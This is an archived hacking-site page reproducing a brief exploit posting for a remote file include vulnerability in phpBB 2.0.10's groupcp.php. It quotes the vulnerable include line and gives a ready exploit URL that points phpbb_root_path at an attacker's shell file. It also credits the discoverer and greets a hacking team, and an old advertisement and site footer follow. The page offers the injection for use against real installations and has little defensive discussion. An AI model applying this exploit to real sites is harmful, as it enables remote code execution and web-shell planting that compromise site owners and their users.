AOH :: Web BBS :: Frequently Exploited

AOH :: Web BBS :: Frequently Exploited :: B06-5304.HTM
PhpBB<=2.0.10 (groupcp.php) Remote File Include Vulnerability

PhpBB<=2.0.10 (groupcp.php) Remote File Include Vulnerability PhpBB<=2.0.10 (groupcp.php) Remote File Include Vulnerability


###########################################
PhpBB<=2.0.10 (groupcp.php) Remote File Include Vulnerability
###########################################

Source Code:
http://www.comscripts.com/jump.php?action=script&id=666 
###########################################

Vulnerable Code:_
include($phpbb_root_path . 'includes/page_header.'.$phpEx);

;
###########################################

Exploit :
http://www.vicTim.com/[PhpBB]/groupcp.php?phpbb_root_path=shell.txt? 
###########################################

Discoverd By :  Mahmood_ali
Conatact : mah_k_2000@hotmail.com 
###########################################

Special Greetings :_  Tryag-Team
###########################################

_________________________________________________________________
Windows Live™ Messenger has arrived. Click here to download it for free! 
http://imagine-msn.com/messenger/launch80/?locale=en-gb

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better). Site design & layout copyright © 1986-2009 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.